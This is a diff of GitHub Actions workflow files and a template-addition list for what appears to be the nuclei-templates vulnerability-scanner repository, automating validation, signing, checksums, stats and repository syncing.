uses: actions/checkout@v4 # checkout the repository content
|
||||||
|
- name: setup python
|
||||||
|
uses: actions/setup-python@v5
|
||||||
|
with:
|
||||||
|
python-version: '3.10' # install the python version needed
|
||||||
|
- name: install python packages
|
||||||
|
run: |
|
||||||
|
pip install requests
|
||||||
|
- name: execute python script on pr
|
||||||
|
if: ${{ github.event_name == 'pull_request' }}
|
||||||
|
run: python .github/scripts/assign_tasks.py ${{ github.event.pull_request.number }} pr ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
- name: execute python script on issue opened
|
||||||
|
if: ${{ github.event_name == 'issues' }}
|
||||||
|
run: python .github/scripts/assign_tasks.py ${{ github.event.issue.number }} issue ${{ secrets.GITHUB_TOKEN }}
|
|
@ -0,0 +1,22 @@
|
||||||
|
name: 🗑️ Cache Purge
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
tags:
|
||||||
|
- '*'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
deploy:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
# Wait for 5 minutes
|
||||||
|
- name: Wait for 2 minutes
|
||||||
|
run: sleep 120
|
||||||
|
|
||||||
|
- name: Purge cache
|
||||||
|
uses: jakejarvis/cloudflare-purge-action@master
|
||||||
|
env:
|
||||||
|
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
|
||||||
|
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}
|
|
@ -0,0 +1,45 @@
|
||||||
|
name: 📝 CVE JSON Metadata
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
branches:
|
||||||
|
- main
|
||||||
|
paths:
|
||||||
|
- '*/cves/**'
|
||||||
|
workflow_dispatch: # allows manual triggering of the workflow
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
cve2json:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@master
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.19
|
||||||
|
|
||||||
|
- name: Run YAML2JSON
|
||||||
|
id: cves
|
||||||
|
run: |
|
||||||
|
go env -w GO111MODULE=off
|
||||||
|
go get gopkg.in/yaml.v3
|
||||||
|
go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/,$GITHUB_WORKSPACE/network/cves/ cves.json
|
||||||
|
md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt
|
||||||
|
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.cves.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git add cves.json cves.json-checksum.txt
|
||||||
|
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.cves.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git pull --rebase
|
||||||
|
git push origin ${{ github.ref }}
|
||||||
|
env:
|
||||||
|
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
|
@ -0,0 +1,43 @@
|
||||||
|
name: 🥳 New Template List
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
branches:
|
||||||
|
- main
|
||||||
|
paths:
|
||||||
|
- '**.yaml'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
templates:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@master
|
||||||
|
with:
|
||||||
|
token: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
persist-credentials: false
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Generate new template list
|
||||||
|
id: new-additions
|
||||||
|
run: |
|
||||||
|
git pull
|
||||||
|
git diff --name-only --diff-filter=A $(git tag | tail -n 1) @ . | grep .yaml | tee .new-additions
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
run: |
|
||||||
|
git config --local user.email "bot@projectdiscovery.io"
|
||||||
|
git config --local user.name "[PDBot]"
|
||||||
|
git add .new-additions -f
|
||||||
|
git commit --allow-empty -m "Auto Generated New Template Addition List [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
uses: ad-m/github-push-action@master
|
||||||
|
with:
|
||||||
|
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
branch: ${{ github.ref }}
|
||||||
|
|
||||||
|
- name: Trigger Remote Workflow with curl
|
||||||
|
run: |
|
||||||
|
curl -i -s -k -X 'POST' -H 'Host: api.github.com' -H "Authorization: token ${{ secrets.GTOKEN }}" --data-binary $'{\"ref\":\"main\"}' 'https://api.github.com/repos/projectdiscovery/early-templates/actions/workflows/reposync.yml/dispatches'
|
|
@ -0,0 +1,47 @@
|
||||||
|
name: 📝 Readme Update
|
||||||
|
|
||||||
|
on:
|
||||||
|
workflow_run:
|
||||||
|
workflows: ["🗒 Templates Stats"]
|
||||||
|
types:
|
||||||
|
- completed
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
- name: Install tree
|
||||||
|
run: sudo apt-get install tree -y
|
||||||
|
|
||||||
|
- name: Check out code
|
||||||
|
uses: actions/checkout@master
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Set up Python
|
||||||
|
uses: actions/setup-python@v5
|
||||||
|
with:
|
||||||
|
python-version: "3.8"
|
||||||
|
|
||||||
|
- name: Update README
|
||||||
|
id: readme-update
|
||||||
|
run: |
|
||||||
|
python .github/scripts/update-readme.py
|
||||||
|
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.readme-update.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git commit -m "Auto README Update [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.readme-update.outputs.CHANGES > 0
|
||||||
|
uses: ad-m/github-push-action@master
|
||||||
|
with:
|
||||||
|
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
branch: ${{ github.ref }}
|
|
@ -0,0 +1,19 @@
|
||||||
|
name: ❄️ YAML Lint
|
||||||
|
|
||||||
|
on:
|
||||||
|
pull_request:
|
||||||
|
paths:
|
||||||
|
- '**.yaml'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
- name: Yamllint
|
||||||
|
uses: karancode/yamllint-github-action@v2.1.1
|
||||||
|
with:
|
||||||
|
yamllint_config_filepath: .yamllint
|
||||||
|
yamllint_strict: false
|
||||||
|
yamllint_comment: true
|
|
@ -0,0 +1,49 @@
|
||||||
|
name: 📝 Template Checksum
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
branches:
|
||||||
|
- main
|
||||||
|
paths:
|
||||||
|
- '**.yaml'
|
||||||
|
workflow_dispatch: # allows manual triggering of the workflow
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
checksum:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
with:
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.21.x
|
||||||
|
|
||||||
|
- name: install checksum generator
|
||||||
|
run: |
|
||||||
|
go install -v github.com/projectdiscovery/nuclei/v3/cmd/generate-checksum@dev
|
||||||
|
|
||||||
|
- name: generate checksum
|
||||||
|
id: checksum
|
||||||
|
run: |
|
||||||
|
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
|
||||||
|
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.checksum.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git add templates-checksum.txt
|
||||||
|
git commit -am "Auto Generated Templates Checksum [$(date)] :robot:"
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.checksum.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git pull --rebase
|
||||||
|
git push origin ${{ github.ref }}
|
||||||
|
env:
|
||||||
|
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
|
@ -0,0 +1,31 @@
|
||||||
|
name: 📑 Template-DB Indexer
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
tags:
|
||||||
|
- '*'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
index:
|
||||||
|
runs-on: ubuntu-latest-16-cores
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.21.x
|
||||||
|
|
||||||
|
- name: Installing Indexer
|
||||||
|
run: |
|
||||||
|
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||||
|
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||||
|
cd nucleish-api/cmd/generate-index/
|
||||||
|
go install
|
||||||
|
|
||||||
|
- name: Generate Index
|
||||||
|
env:
|
||||||
|
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
|
||||||
|
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
|
||||||
|
run: |
|
||||||
|
generate-index -mode templates
|
|
@ -0,0 +1,51 @@
|
||||||
|
name: ☑️ Template Sign
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
branches:
|
||||||
|
- main
|
||||||
|
paths:
|
||||||
|
- '**.yaml'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
with:
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.21.x
|
||||||
|
|
||||||
|
- name: nuclei install
|
||||||
|
run: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@dev
|
||||||
|
|
||||||
|
- name: Template Sign
|
||||||
|
id: sign
|
||||||
|
run: |
|
||||||
|
nuclei -lfa -duc -sign -t /home/runner/work/nuclei-templates/nuclei-templates
|
||||||
|
nuclei -lfa -duc -t /home/runner/work/nuclei-templates/nuclei-templates
|
||||||
|
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
env:
|
||||||
|
NUCLEI_USER_CERTIFICATE: ${{ secrets.NUCLEI_USER_CERTIFICATE }}
|
||||||
|
NUCLEI_USER_PRIVATE_KEY: ${{ secrets.NUCLEI_USER_PRIVATE_KEY }}
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.sign.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git add cves.json cves.json-checksum.txt
|
||||||
|
git commit -m "Auto Template Signing [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.sign.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git pull --rebase
|
||||||
|
git push origin ${{ github.ref }}
|
||||||
|
env:
|
||||||
|
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
|
@ -0,0 +1,29 @@
|
||||||
|
name: 🛠 Template Validate
|
||||||
|
|
||||||
|
on:
|
||||||
|
pull_request:
|
||||||
|
paths:
|
||||||
|
- '**.yaml'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
with:
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.21.x
|
||||||
|
|
||||||
|
- name: nuclei install
|
||||||
|
run: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
|
||||||
|
|
||||||
|
- name: Template Validation
|
||||||
|
run: |
|
||||||
|
cp -r ${{ github.workspace }} $HOME
|
||||||
|
nuclei -duc -validate -allow-local-file-access -et /home/runner/nuclei-templates/config/.git -et /home/runner/nuclei-templates/config
|
||||||
|
nuclei -duc -validate -w ./workflows -allow-local-file-access -et /home/runner/nuclei-templates/config/.git -et /home/runner/nuclei-templates/config
|
|
@ -0,0 +1,46 @@
|
||||||
|
name: 🤖 TemplateMan
|
||||||
|
|
||||||
|
on:
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
templateman:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
with:
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.21.x
|
||||||
|
|
||||||
|
- name: Install TemplateMan CLI Client
|
||||||
|
run: |
|
||||||
|
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||||
|
git clone https://github.com/projectdiscovery/templateman.git
|
||||||
|
cd templateman/templateman-cli/cmd/tmc
|
||||||
|
go install
|
||||||
|
|
||||||
|
- name: Run TemplateMan
|
||||||
|
id: tmc
|
||||||
|
run: |
|
||||||
|
echo /home/runner/work/nuclei-templates/nuclei-templates | tmc -mr -e
|
||||||
|
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.tmc.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git commit --allow-empty -m "TemplateMan Update [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.tmc.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git pull --rebase
|
||||||
|
git push origin ${{ github.ref }}
|
||||||
|
env:
|
||||||
|
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
|
@ -0,0 +1,58 @@
|
||||||
|
name: 🗒 Templates Stats
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
tags:
|
||||||
|
- '*'
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
build:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
with:
|
||||||
|
fetch-depth: 0
|
||||||
|
|
||||||
|
- name: Set up Go
|
||||||
|
uses: actions/setup-go@v5
|
||||||
|
with:
|
||||||
|
go-version: 1.19
|
||||||
|
|
||||||
|
- name: Installing Template Stats
|
||||||
|
run: |
|
||||||
|
go install github.com/projectdiscovery/templates-stats@main
|
||||||
|
shell: bash
|
||||||
|
|
||||||
|
- name: Markdown Stats
|
||||||
|
run: |
|
||||||
|
templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/
|
||||||
|
shell: bash
|
||||||
|
|
||||||
|
- name: JSON Stats
|
||||||
|
run: |
|
||||||
|
templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/
|
||||||
|
shell: bash
|
||||||
|
|
||||||
|
- name: Top 10 Stats
|
||||||
|
run: |
|
||||||
|
templates-stats -output TOP-10.md -top 10 -path /home/runner/work/nuclei-templates/nuclei-templates/
|
||||||
|
shell: bash
|
||||||
|
|
||||||
|
- name: Get statistical changes
|
||||||
|
id: stats
|
||||||
|
run: git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.stats.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git add TEMPLATES-STATS.*
|
||||||
|
git add TOP-10.md
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
uses: ad-m/github-push-action@master
|
||||||
|
with:
|
||||||
|
github_token: ${{ secrets.GITHUB_TOKEN }}
|
|
@ -0,0 +1,58 @@
|
||||||
|
name: Sync Repositories Workflow
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
paths:
|
||||||
|
- '.new-additions'
|
||||||
|
- 'http/cves/2015/CVE-2015-2794.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-42343.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-46574.yaml'
|
||||||
|
- 'http/exposures/docker-daemon-exposed.yaml'
|
||||||
|
- 'http/token-spray/api-openai.yaml'
|
||||||
|
- 'http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml'
|
||||||
|
- 'http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml'
|
||||||
|
- 'http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml'
|
||||||
|
- 'cloud/enum/aws-app-enum.yaml'
|
||||||
|
- 'cloud/enum/aws-s3-bucket-enum.yaml'
|
||||||
|
- 'cloud/enum/azure-db-enum.yaml'
|
||||||
|
- 'cloud/enum/azure-vm-cloud-enum.yaml'
|
||||||
|
- 'cloud/enum/azure-website-enum.yaml'
|
||||||
|
- 'cloud/enum/gcp-app-engine-enum.yaml'
|
||||||
|
- 'cloud/enum/gcp-bucket-enum.yaml'
|
||||||
|
- 'cloud/enum/gcp-firebase-app-enum.yaml'
|
||||||
|
- 'cloud/enum/gcp-firebase-rtdb-enum.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-41109.yaml'
|
||||||
|
- 'network/misconfig/erlang-daemon.yaml'
|
||||||
|
- 'code/cves/2019/CVE-2019-14287.yaml'
|
||||||
|
- 'code/cves/2021/CVE-2021-3156.yaml'
|
||||||
|
- 'http/cves/2020/CVE-2020-12124.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-50968.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-51467.yaml'
|
||||||
|
- 'http/misconfiguration/cookies-without-httponly.yaml'
|
||||||
|
- 'http/misconfiguration/php/php-composer-binary.yaml'
|
||||||
|
- 'http/vulnerabilities/dahua/dahua-icc-backdoor-user.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-44353.yaml'
|
||||||
|
- 'http/technologies/cisco-asa-detect.yaml'
|
||||||
|
- 'http/vulnerabilities/dlink/dlink-netgear-xss.yaml'
|
||||||
|
- 'http/exposed-panels/goodjob-dashboard.yaml'
|
||||||
|
- 'http/exposed-panels/onlyoffice-login-panel.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-6379.yaml'
|
||||||
|
- 'http/misconfiguration/apache/apache-server-status.yaml'
|
||||||
|
- 'http/osint/piratebay.yaml'
|
||||||
|
- 'javascript/network/smb/smb-anonymous-access.yaml'
|
||||||
|
- 'javascript/network/smb/smb-shares.yaml'
|
||||||
|
- 'javascript/network/smb/smb-signing-not-required.yaml'
|
||||||
|
- 'javascript/network/smb/smb2-capabilities.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-6623.yaml'
|
||||||
|
- 'http/cves/2024/CVE-2024-0352.yaml'
|
||||||
|
- 'http/default-logins/camunda/camunda-default-login.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-50917.yaml'
|
||||||
|
- 'http/misconfiguration/cookies-without-httponly-secure.yaml'
|
||||||
|
- 'http/vulnerabilities/wanhu/wanhuoa-downloadservlet-lfi.yaml'
|
||||||
|
workflow_dispatch:
|
||||||
|
jobs:
|
||||||
|
triggerRemoteWorkflow:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- name: Trigger Remote Workflow with curl
|
||||||
|
run: |
|
||||||
|
curl -i -s -k -X 'POST' -H 'Host: api.github.com' -H "Authorization: token ${{ secrets.GTOKEN }}" --data-binary $'{\"ref\":\"main\"}' 'https://api.github.com/repos/projectdiscovery/early-templates/actions/workflows/reposync.yml/dispatches'
|
|
@ -0,0 +1,43 @@
|
||||||
|
name: ✨ WordPress Plugins - Update
|
||||||
|
|
||||||
|
on:
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
Update:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- name: Check out repository code
|
||||||
|
uses: actions/checkout@v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token
|
||||||
|
fetch-depth: 0 # otherwise, you will failed to push refs to dest repo
|
||||||
|
|
||||||
|
- name: Install Python3
|
||||||
|
uses: actions/setup-python@v5
|
||||||
|
with:
|
||||||
|
python-version: "3.10"
|
||||||
|
- run: |
|
||||||
|
python -m pip install --upgrade pip
|
||||||
|
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
|
||||||
|
|
||||||
|
- name: Update Templates
|
||||||
|
id: update-templates
|
||||||
|
run: |
|
||||||
|
python3 .github/scripts/wordpress-plugins-update.py
|
||||||
|
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.update-templates.outputs.CHANGES > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git add --all
|
||||||
|
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.update-templates.outputs.CHANGES > 0
|
||||||
|
uses: ad-m/github-push-action@master
|
||||||
|
with:
|
||||||
|
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
branch: ${{ github.ref }}
|
|
@ -0,0 +1,6 @@
|
||||||
|
.idea/
|
||||||
|
.DS_Store
|
||||||
|
local/
|
||||||
|
.checksum
|
||||||
|
.new-additions
|
||||||
|
*.txt
|
141
.new-additions
141
.new-additions
|
@ -1,97 +1,44 @@
|
||||||
code/privilege-escalation/linux/binary/privesc-aa-exec.yaml
|
cloud/enum/aws-app-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-ash.yaml
|
cloud/enum/aws-s3-bucket-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-awk.yaml
|
cloud/enum/azure-db-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-bash.yaml
|
cloud/enum/azure-vm-cloud-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-cdist.yaml
|
cloud/enum/azure-website-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-choom.yaml
|
cloud/enum/gcp-app-engine-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-cpulimit.yaml
|
cloud/enum/gcp-bucket-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-csh.yaml
|
cloud/enum/gcp-firebase-app-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-csvtool.yaml
|
cloud/enum/gcp-firebase-rtdb-enum.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-dash.yaml
|
code/cves/2019/CVE-2019-14287.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-dc.yaml
|
code/cves/2021/CVE-2021-3156.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-distcc.yaml
|
http/cves/2015/CVE-2015-2794.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-elvish.yaml
|
http/cves/2020/CVE-2020-12124.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-enscript.yaml
|
http/cves/2023/CVE-2023-41109.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-env.yaml
|
http/cves/2023/CVE-2023-42343.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-expect.yaml
|
http/cves/2023/CVE-2023-44353.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-find.yaml
|
http/cves/2023/CVE-2023-46574.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-fish.yaml
|
http/cves/2023/CVE-2023-50917.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-flock.yaml
|
http/cves/2023/CVE-2023-50968.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-gawk.yaml
|
http/cves/2023/CVE-2023-51467.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-grc.yaml
|
http/cves/2023/CVE-2023-6379.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-ionice.yaml
|
http/cves/2023/CVE-2023-6623.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-julia.yaml
|
http/cves/2024/CVE-2024-0352.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-lftp.yaml
|
http/default-logins/camunda/camunda-default-login.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-ltrace.yaml
|
http/exposed-panels/goodjob-dashboard.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-lua.yaml
|
http/exposed-panels/onlyoffice-login-panel.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-mawk.yaml
|
http/exposures/docker-daemon-exposed.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-multitime.yaml
|
http/misconfiguration/apache/apache-server-status.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-mysql.yaml
|
http/misconfiguration/cookies-without-httponly-secure.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-nawk.yaml
|
http/misconfiguration/php/php-composer-binary.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-nice.yaml
|
http/osint/piratebay.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-node.yaml
|
http/technologies/cisco-asa-detect.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-nsenter.yaml
|
http/token-spray/api-openai.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-perl.yaml
|
http/vulnerabilities/dahua/dahua-icc-backdoor-user.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-pexec.yaml
|
http/vulnerabilities/dlink/dlink-netgear-xss.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-php.yaml
|
http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-posh.yaml
|
http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-python.yaml
|
http/vulnerabilities/wanhu/wanhuoa-downloadservlet-lfi.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-rake.yaml
|
http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-rc.yaml
|
javascript/network/smb/smb-anonymous-access.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-rlwrap.yaml
|
javascript/network/smb/smb-shares.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-rpm.yaml
|
javascript/network/smb/smb-signing-not-required.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-rpmdb.yaml
|
javascript/network/smb/smb2-capabilities.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-rpmverify.yaml
|
network/misconfig/erlang-daemon.yaml
|
||||||
code/privilege-escalation/linux/binary/privesc-ruby.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-run-parts.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-sash.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-slsh.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-socat.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-softlimit.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-sqlite3.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-ssh-agent.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-sshpass.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-stdbuf.yaml
|
|
||||||
